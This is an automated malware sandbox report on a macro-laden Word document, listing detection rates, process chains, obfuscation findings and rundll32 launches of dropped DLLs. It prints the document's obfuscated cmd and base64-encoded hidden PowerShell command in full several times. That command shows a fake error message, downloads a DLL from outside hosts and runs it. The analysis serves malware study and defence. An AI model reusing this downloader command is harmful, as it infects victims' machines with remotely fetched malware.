                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\O3pp1b5\Y84vhdh\A41O.dll AnyString
                      Source: Mensaje-22-012021.docVirustotal: Detection: 61%
                      Source: Mensaje-22-012021.docMetadefender: Detection: 32%
                      Source: Mensaje-22-012021.docReversingLabs: Detection: 62%
                      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAHMAZQBUAC0AVgBhAHIASQBhAGIAbABlACAAIAAoACcARwAnACsAJwBIAHAAJwApACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADMAfQB7ADIAfQB7ADUAfQB7ADQAfQB7ADYAfQB7ADEAfQB7ADAAfQAiAC0AZgAgACcAWQAnACwAJwBUAE8AUgAnACwAJwBZACcALAAnAFMAJwAsACcASQByACcALAAnAHMAdABlAG0ALgBJAG8ALgBkACcALAAnAEUAQwAnACkAIAAgACkAIAAgADsAIAAgACAAJABYAG8AMwA3AHQAIAAgAD0AIAAgAFsAVABZAHAARQBdACgAIgB7ADIAfQB7ADMAfQB7ADEAfQB7ADAAfQB7ADQAfQAiAC0AZgAnAE4AdABNAEEAbgBhAEcAZQAnACwAJwBtAC4AbgBFAHQALgBTAEUAUgBWAEkAQwBlAFAAbwBpACcALAAnAHMAWQBzAFQAJwAsACcAZQAnACwAJwBSACcAKQA7ACAAJABNAHAAZAB5AHIAXwAxAD0AJABOADUAXwBHACAAKwAgAFsAYwBoAGEAcgBdACgAMwAzACkAIAArACAAJABIADkAMgBLADsAJABHADgANQBWAD0AKAAnAFAAJwArACgAJwA1ACcAKwAnADcAQgAnACkAKQA7ACAAIAAoACAAIABpAFQAZQBNACAAKAAnAFYAQQAnACsAJwBSAGkAYQBiAEwAJwArACcAZQA6AEcASABQACcAKQApAC4AdgBBAGwAdQBlADoAOgAiAEMAUgBFAGAAQQB0AGAARQBEAGAAaQByAEUAQwB0AE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0ATwAzAHAAcAAxAGIAJwArACcANQB7ACcAKwAnADAAfQAnACsAKAAnAFkAOAA0AHYAaABkACcAKwAnAGgAJwApACsAJwB7ADAAfQAnACkAIAAgAC0ARgAgAFsAQwBIAGEAcgBdADkAMgApACkAOwAkAEMANAA2AFIAPQAoACcAQgA0ACcAKwAnADEASwAnACkAOwAgACgAIABkAGkAcgAgACAAdgBhAFIASQBhAEIAbABFADoAWABPADMANwB0ACAAIAApAC4AVgBhAGwAVQBlADoAOgAiAFMAZQBDAFUAcgBJAHQAYAB5AFAAcgBvAHQAbwBgAEMAYABvAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAxACcAKQArACcAMgAnACkAOwAkAEkANQAzAEgAPQAoACgAJwBDADEAJwArACcANQAnACkAKwAnAEUAJwApADsAJABQAGYAXwB3AHkAcwAzACAAPQAgACgAKAAnAEEAJwArACcANAAxACcAKQArACcATwAnACkAOwAkAEUANAAyAFQAPQAoACgAJwBEADcAJwArACcAMQAnACkAKwAnAEgAJwApADsAJABJADMAegAyAGMAcwByAD0AJABIAE8ATQBFACsAKAAoACgAJwBGAFoAbwBPACcAKwAnADMAJwArACcAcABwADEAJwApACsAKAAnAGIANQBGAFoAJwArACcAbwBZADgAJwArACcANAB2AGgAJwApACsAJwBkACcAKwAnAGgAJwArACgAJwBGAFoAJwArACcAbwAnACkAKQAuACIAcgBFAFAAYABMAGAAQQBDAEUAIgAoACgAJwBGACcAKwAnAFoAbwAnACkALABbAFMAVABSAGkAbgBHAF0AWwBjAGgAQQByAF0AOQAyACkAKQArACQAUABmAF8AdwB5AHMAMwArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQARQAwADQARQA9ACgAKAAnAFoAJwArACcAOQA5ACcAKQArACcAUQAnACkAOwAkAFMAOAA0AGgAOQBoAG4APQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABGAG8AdQBvADEAaAAxAD0AKAAoACcAeAAgACcAKwAnAFsAJwArACcAIABzAGgAIABiACcAKwAnADoALwAvAHUAJwApACsAKAAnAGEAZwAnACsAJwByACcAKQArACcAaQB0ACcAKwAnAGUAYwAnACsAJwBoACcAKwAoACcALgAnACsAJwBjAG8AJwApACsAKAAnAG0AJwArACcALwBjACcAKwAnAGcAaQAtAGIAJwApACsAJwBpACcAKwAoACcAbgAvACcAKwAnAGEANQBHACcAKwAnAC8AIQB4ACcAKQArACcAIABbACcAKwAoACcAIAAnACsAJwBzAGgAJwArACcAIAAnACsAJwBiADoALwAvACcAKwAnAHcAdwB3AC4AOQAxAHkAJwApACsAKAAnAHUAZABhACcAKwAnAG8AJwArACcALgBjAG8AJwApACsAKAAnAG0ALwB3AHAAJwArACcALQAnACsAJwBhAGQAJwApACsAKAAnAG0AaQBuAC8AJwArACcASwBLAEgAJwArACcAdAAnACkAKwAoACcAMQAvACEAeAAgAFsAJwArACcAIAAnACsAJwBzAGgAIABiACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwB5AG8AJwArACcAdQByAGMAJwApACsAKAAnAGwAZQBhAG4AZQByAHMAdQByACcAKwAnAGYAYQAnACsAJwBjAGUAJwArACcAcwAnACkAKwAoACcALgBjAG8AbQAnACsAJwAvACcAKQArACgAJwBmAG8AJwArACcAdQByAC0AJwApACsAKAAnAG0AJwArACcAbwBuACcAKwAnAGsAcwAtAGEAYwBhAHMA
                      Source: unknownProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAHMAZQBUAC0AVgBhAHIASQBhAGIAbABlACAAIAAoACcARwAnACsAJwBIAHAAJwApACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADMAfQB7ADIAfQB7ADUAfQB7ADQAfQB7ADYAfQB7ADEAfQB7ADAAfQAiAC0AZgAgACcAWQAnACwAJwBUAE8AUgAnACwAJwBZACcALAAnAFMAJwAsACcASQByACcALAAnAHMAdABlAG0ALgBJAG8ALgBkACcALAAnAEUAQwAnACkAIAAgACkAIAAgADsAIAAgACAAJABYAG8AMwA3AHQAIAAgAD0AIAAgAFsAVABZAHAARQBdACgAIgB7ADIAfQB7ADMAfQB7ADEAfQB7ADAAfQB7ADQAfQAiAC0AZgAnAE4AdABNAEEAbgBhAEcAZQAnACwAJwBtAC4AbgBFAHQALgBTAEUAUgBWAEkAQwBlAFAAbwBpACcALAAnAHMAWQBzAFQAJwAsACcAZQAnACwAJwBSACcAKQA7ACAAJABNAHAAZAB5AHIAXwAxAD0AJABOADUAXwBHACAAKwAgAFsAYwBoAGEAcgBdACgAMwAzACkAIAArACAAJABIADkAMgBLADsAJABHADgANQBWAD0AKAAnAFAAJwArACgAJwA1ACcAKwAnADcAQgAnACkAKQA7ACAAIAAoACAAIABpAFQAZQBNACAAKAAnAFYAQQAnACsAJwBSAGkAYQBiAEwAJwArACcAZQA6AEcASABQACcAKQApAC4AdgBBAGwAdQBlADoAOgAiAEMAUgBFAGAAQQB0AGAARQBEAGAAaQByAEUAQwB0AE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0ATwAzAHAAcAAxAGIAJwArACcANQB7ACcAKwAnADAAfQAnACsAKAAnAFkAOAA0AHYAaABkACcAKwAnAGgAJwApACsAJwB7ADAAfQAnACkAIAAgAC0ARgAgAFsAQwBIAGEAcgBdADkAMgApACkAOwAkAEMANAA2AFIAPQAoACcAQgA0ACcAKwAnADEASwAnACkAOwAgACgAIABkAGkAcgAgACAAdgBhAFIASQBhAEIAbABFADoAWABPADMANwB0ACAAIAApAC4AVgBhAGwAVQBlADoAOgAiAFMAZQBDAFUAcgBJAHQAYAB5AFAAcgBvAHQAbwBgAEMAYABvAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAxACcAKQArACcAMgAnACkAOwAkAEkANQAzAEgAPQAoACgAJwBDADEAJwArACcANQAnACkAKwAnAEUAJwApADsAJABQAGYAXwB3AHkAcwAzACAAPQAgACgAKAAnAEEAJwArACcANAAxACcAKQArACcATwAnACkAOwAkAEUANAAyAFQAPQAoACgAJwBEADcAJwArACcAMQAnACkAKwAnAEgAJwApADsAJABJADMAegAyAGMAcwByAD0AJABIAE8ATQBFACsAKAAoACgAJwBGAFoAbwBPACcAKwAnADMAJwArACcAcABwADEAJwApACsAKAAnAGIANQBGAFoAJwArACcAbwBZADgAJwArACcANAB2AGgAJwApACsAJwBkACcAKwAnAGgAJwArACgAJwBGAFoAJwArACcAbwAnACkAKQAuACIAcgBFAFAAYABMAGAAQQBDAEUAIgAoACgAJwBGACcAKwAnAFoAbwAnACkALABbAFMAVABSAGkAbgBHAF0AWwBjAGgAQQByAF0AOQAyACkAKQArACQAUABmAF8AdwB5AHMAMwArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQARQAwADQARQA9ACgAKAAnAFoAJwArACcAOQA5ACcAKQArACcAUQAnACkAOwAkAFMAOAA0AGgAOQBoAG4APQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABGAG8AdQBvADEAaAAxAD0AKAAoACcAeAAgACcAKwAnAFsAJwArACcAIABzAGgAIABiACcAKwAnADoALwAvAHUAJwApACsAKAAnAGEAZwAnACsAJwByACcAKQArACcAaQB0ACcAKwAnAGUAYwAnACsAJwBoACcAKwAoACcALgAnACsAJwBjAG8AJwApACsAKAAnAG0AJwArACcALwBjACcAKwAnAGcAaQAtAGIAJwApACsAJwBpACcAKwAoACcAbgAvACcAKwAnAGEANQBHACcAKwAnAC8AIQB4ACcAKQArACcAIABbACcAKwAoACcAIAAnACsAJwBzAGgAJwArACcAIAAnACsAJwBiADoALwAvACcAKwAnAHcAdwB3AC4AOQAxAHkAJwApACsAKAAnAHUAZABhACcAKwAnAG8AJwArACcALgBjAG8AJwApACsAKAAnAG0ALwB3AHAAJwArACcALQAnACsAJwBhAGQAJwApACsAKAAnAG0AaQBuAC8AJwArACcASwBLAEgAJwArACcAdAAnACkAKwAoACcAMQAvACEAeAAgAFsAJwArACcAIAAnACsAJwBzAGgAIABiACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwB5AG8AJwArACcAdQByAGMAJwApACsAKAAnAGwAZQBhAG4AZQByAHMAdQByACcAKwAnAGYAYQAnACsAJwBjAGUAJwArACcAcwAnACkAKwAoACcALgBjAG8AbQAnACsAJwAvACcAKQArACgAJwBmAG8AJwArACcAdQByAC0AJwApACsAKAAnAG0AJwArACcAbwBuACcAKwAnAGsAcwAtAGEAYwBhAHMAegAvAE8AJwApACsAJwAyAG0AJwArACcAeQAnACsAKAAnAC8AIQB4ACAAJwArACcAWwAnAC
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\O3pp1b5\Y84vhdh\A41O.dll AnyString
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\O3pp1b5\Y84vhdh\A41O.dll AnyString
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\O3pp1b5\Y84vhdh\A41O.dll',#1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eeyfocnhd\rdcslqee.tfa',YbeYBwKPvEN
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eeyfocnhd\rdcslqee.tfa',#1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ildimivpppjhtpz\eazqsushdwhbfu.ifu',kkHcNcnl
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ildimivpppjhtpz\eazqsushdwhbfu.ifu',#1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fmdnydfawb\oqvjuvcbq.olk',kIWFufWNhCJ
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fmdnydfawb\oqvjuvcbq.olk',#1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qwyewmqcy\rawdlpqy.lat',jKmVZCpuSZSXyAJ
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qwyewmqcy\rawdlpqy.lat',#1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cryxkxijzq\qqczujwsu.vhn',LFytx
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cryxkxijzq\qqczujwsu.vhn',#1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qaatclqucsvpjzyl\gfpifopxbsfonqs.zax',MAwEWTVYSMc
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qaatclqucsvpjzyl\gfpifopxbsfonqs.zax',#1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bpckjlpwgpssel\qweijehrgslfr.bwc',jvGjlVYmjUQdf
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bpckjlpwgpssel\qweijehrgslfr.bwc',#1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Usmneuxccxh\yvkvjeybon.rgv',ymrQU
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Usmneuxccxh\yvkvjeybon.rgv',#1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAHMAZQBUAC0AVgBhAHIASQBhAGIAbABlACAAIAAoACcARwAnACsAJwBIAHAAJwApACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADMAfQB7ADIAfQB7ADUAfQB7ADQAfQB7ADYAfQB7ADEAfQB7ADAAfQAiAC0AZgAgACcAWQAnACwAJwBUAE8AUgAnACwAJwBZACcALAAnAFMAJwAsACcASQByACcALAAnAHMAdABlAG0ALgBJAG8ALgBkACcALAAnAEUAQwAnACkAIAAgACkAIAAgADsAIAAgACAAJABYAG8AMwA3AHQAIAAgAD0AIAAgAFsAVABZAHAARQBdACgAIgB7ADIAfQB7ADMAfQB7ADEAfQB7ADAAfQB7ADQAfQAiAC0AZgAnAE4AdABNAEEAbgBhAEcAZQAnACwAJwBtAC4AbgBFAHQALgBTAEUAUgBWAEkAQwBlAFAAbwBpACcALAAnAHMAWQBzAFQAJwAsACcAZQAnACwAJwBSACcAKQA7ACAAJABNAHAAZAB5AHIAXwAxAD0AJABOADUAXwBHACAAKwAgAFsAYwBoAGEAcgBdACgAMwAzACkAIAArACAAJABIADkAMgBLADsAJABHADgANQBWAD0AKAAnAFAAJwArACgAJwA1ACcAKwAnADcAQgAnACkAKQA7ACAAIAAoACAAIABpAFQAZQBNACAAKAAnAFYAQQAnACsAJwBSAGkAYQBiAEwAJwArACcAZQA6AEcASABQACcAKQApAC4AdgBBAGwAdQBlADoAOgAiAEMAUgBFAGAAQQB0AGAARQBEAGAAaQByAEUAQwB0AE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0ATwAzAHAAcAAxAGIAJwArACcANQB7ACcAKwAnADAAfQAnACsAKAAnAFkAOAA0AHYAaABkACcAKwAnAGgAJwApACsAJwB7ADAAfQAnACkAIAAgAC0ARgAgAFsAQwBIAGEAcgBdADkAMgApACkAOwAkAEMANAA2AFIAPQAoACcAQgA0ACcAKwAnADEASwAnACkAOwAgACgAIABkAGkAcgAgACAAdgBhAFIASQBhAEIAbABFADoAWABPADMANwB0ACAAIAApAC4AVgBhAGwAVQBlADoAOgAiAFMAZQBDAFUAcgBJAHQAYAB5AFAAcgBvAHQAbwBgAEMAYABvAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAxACcAKQArACcAMgAnACkAOwAkAEkANQAzAEgAPQAoACgAJwBDADEAJwArACcANQAnACkAKwAnAEUAJwApADsAJABQAGYAXwB3AHkAcwAzACAAPQAgACgAKAAnAEEAJwArACcANAAxACcAKQArACcATwAnACkAOwAkAEUANAAyAFQAPQAoACgAJwBEADcAJwArACcAMQAnACkAKwAnAEgAJwApADsAJABJADMAegAyAGMAcwByAD0AJABIAE8ATQBFACsAKAAoACgAJwBGAFoAbwBPACcAKwAnADMAJwArACcAcABwADEAJwApACsAKAAnAGIANQBGAFoAJwArACcAbwBZADgAJwArACcANAB2AGgAJwApACsAJwBkACcAKwAnAGgAJwArACgAJwBGAFoAJwArACcAbwAnACkAKQAuACIAcgBFAFAAYABMAGAAQQBDAEUAIgAoACgAJwBGACcAKwAnAFoAbwAnACkALABbAFMAVABSAGkAbgBHAF0AWwBjAGgAQQByAF0AOQAyACkAKQArACQAUABmAF8AdwB5AHMAMwArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQARQAwADQARQA9ACgAKAAnAFoAJwArACcAOQA5ACcAKQArACcAUQAnACkAOwAkAFMAOAA0AGgAOQBoAG4APQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABGAG8AdQBvADEAaAAxAD0AKAAoACcAeAAgACcAKwAnAFsAJwArACcAIABzAGgAIABiACcAKwAnADoALwAvAHUAJwApACsAKAAnAGEAZwAnACsAJwByACcAKQArACcAaQB0ACcAKwAnAGUAYwAnACsAJwBoACcAKwAoACcALgAnACsAJwBjAG8AJwApACsAKAAnAG0AJwArACcALwBjACcAKwAnAGcAaQAtAGIAJwApACsAJwBpACcAKwAoACcAbgAvACcAKwAnAGEANQBHACcAKwAnAC8AIQB4ACcAKQArACcAIABbACcAKwAoACcAIAAnACsAJwBzAGgAJwArACcAIAAnACsAJwBiADoALwAvACcAKwAnAHcAdwB3AC4AOQAxAHkAJwApACsAKAAnAHUAZABhACcAKwAnAG8AJwArACcALgBjAG8AJwApACsAKAAnAG0ALwB3AHAAJwArACcALQAnACsAJwBhAGQAJwApACsAKAAnAG0AaQBuAC8AJwArACcASwBLAEgAJwArACcAdAAnACkAKwAoACcAMQAvACEAeAAgAFsAJwArACcAIAAnACsAJwBzAGgAIABiACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwB5AG8AJwArACcAdQByAGMAJwApACsAKAAnAGwAZQBhAG4AZQByAHMAdQByACcAKwAnAGYAYQAnACsAJwBjAGUAJwArACcAcwAnACkAKwAoACcALgBjAG8AbQAnACsAJwAvACcAKQArACgAJwBmAG8AJwArACcAdQByAC0AJwApACsAKAAnAG0AJwArACcAbwBuACcAKwAnAGsAcwAtAGEAYwBhAHMAegAvAE8AJwApACsAJwAyAG0AJwArACcAeQAnACsAKAAnAC8AIQB4ACAAJwArACcAWwAnAC
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\O3pp1b5\Y84vhdh\A41O.dll AnyString
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\O3pp1b5\Y84vhdh\A41O.dll AnyString
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\O3pp1b5\Y84vhdh\A41O.dll',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eeyfocnhd\rdcslqee.tfa',YbeYBwKPvEN
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eeyfocnhd\rdcslqee.tfa',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ildimivpppjhtpz\eazqsushdwhbfu.ifu',kkHcNcnl
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ildimivpppjhtpz\eazqsushdwhbfu.ifu',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fmdnydfawb\oqvjuvcbq.olk',kIWFufWNhCJ
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fmdnydfawb\oqvjuvcbq.olk',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qwyewmqcy\rawdlpqy.lat',jKmVZCpuSZSXyAJ
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qwyewmqcy\rawdlpqy.lat',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cryxkxijzq\qqczujwsu.vhn',LFytx
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cryxkxijzq\qqczujwsu.vhn',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qaatclqucsvpjzyl\gfpifopxbsfonqs.zax',MAwEWTVYSMc
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qaatclqucsvpjzyl\gfpifopxbsfonqs.zax',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bpckjlpwgpssel\qweijehrgslfr.bwc',jvGjlVYmjUQdf
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bpckjlpwgpssel\qweijehrgslfr.bwc',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Usmneuxccxh\yvkvjeybon.rgv',ymrQU
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Usmneuxccxh\yvkvjeybon.rgv',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Source: Binary string: C:\Windows\symbols\dll\System.pdbom source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
                      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
                      Source: Binary string: ws\System.pdbpdbtem.pdb\d source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\dll\System.pdbge source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
                      Source: Binary string: System.pdb source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
                      Source: Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbdb source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
                      Source: Binary string: m.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
                      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2156319928.0000000002030000.00000002.00000001.sdmp
                      Source: Binary string: <ystem.pdb source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
                      Source: Mensaje-22-012021.docInitial sample: OLE summary subject = SQL proactive Tools & Tools user-centric Electronics RSS withdrawal Movies, Garden & Clothing Beauty Unbranded Fresh Mouse bluetooth e-enable HDD

                      Data Obfuscation:

                      barindex
                      Document contains an embedded VBA with many GOTO operations indicating source code obfuscationShow sources
                      Source: Mensaje-22-012021.docStream path 'Macros/VBA/G8g2gkh6bwry__ui' : High number of GOTO operations
                      Source: VBA code instrumentationOLE, VBA macro, High number of GOTO operations: Module G8g2gkh6bwry__ui
                      Document contains an embedded VBA with many string operations indicating source code obfuscationShow sources
                      Source: Mensaje-22-012021.docStream path 'Macros/VBA/G8g2gkh6bwry__ui' : High number of string operations
                      Source: VBA code instrumentationOLE, VBA macro, High number of string operations: Module G8g2gkh6bwry__ui
                      Obfuscated command line foundShow sources
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAHMAZQBUAC0AVgBhAHIASQBhAGIAbABlACAAIAAoACcARwAnACsAJwBIAHAAJwApACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADMAfQB7ADIAfQB7ADUAfQB7ADQAfQB7ADYAfQB7ADEAfQB7ADAAfQAiAC0AZgAgACcAWQAnACwAJwBUAE8AUgAnACwAJwBZACcALAAnAFMAJwAsACcASQByACcALAAnAHMAdABlAG0ALgBJAG8ALgBkACcALAAnAEUAQwAnACkAIAAgACkAIAAgADsAIAAgACAAJABYAG8AMwA3AHQAIAAgAD0AIAAgAFsAVABZAHAARQBdACgAIgB7ADIAfQB7ADMAfQB7ADEAfQB7ADAAfQB7ADQAfQAiAC0AZgAnAE4AdABNAEEAbgBhAEcAZQAnACwAJwBtAC4AbgBFAHQALgBTAEUAUgBWAEkAQwBlAFAAbwBpACcALAAnAHMAWQBzAFQAJwAsACcAZQAnACwAJwBSACcAKQA7ACAAJABNAHAAZAB5AHIAXwAxAD0AJABOADUAXwBHACAAKwAgAFsAYwBoAGEAcgBdACgAMwAzACkAIAArACAAJABIADkAMgBLADsAJABHADgANQBWAD0AKAAnAFAAJwArACgAJwA1ACcAKwAnADcAQgAnACkAKQA7ACAAIAAoACAAIABpAFQAZQBNACAAKAAnAFYAQQAnACsAJwBSAGkAYQBiAEwAJwArACcAZQA6AEcASABQACcAKQApAC4AdgBBAGwAdQBlADoAOgAiAEMAUgBFAGAAQQB0AGAARQBEAGAAaQByAEUAQwB0AE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0ATwAzAHAAcAAxAGIA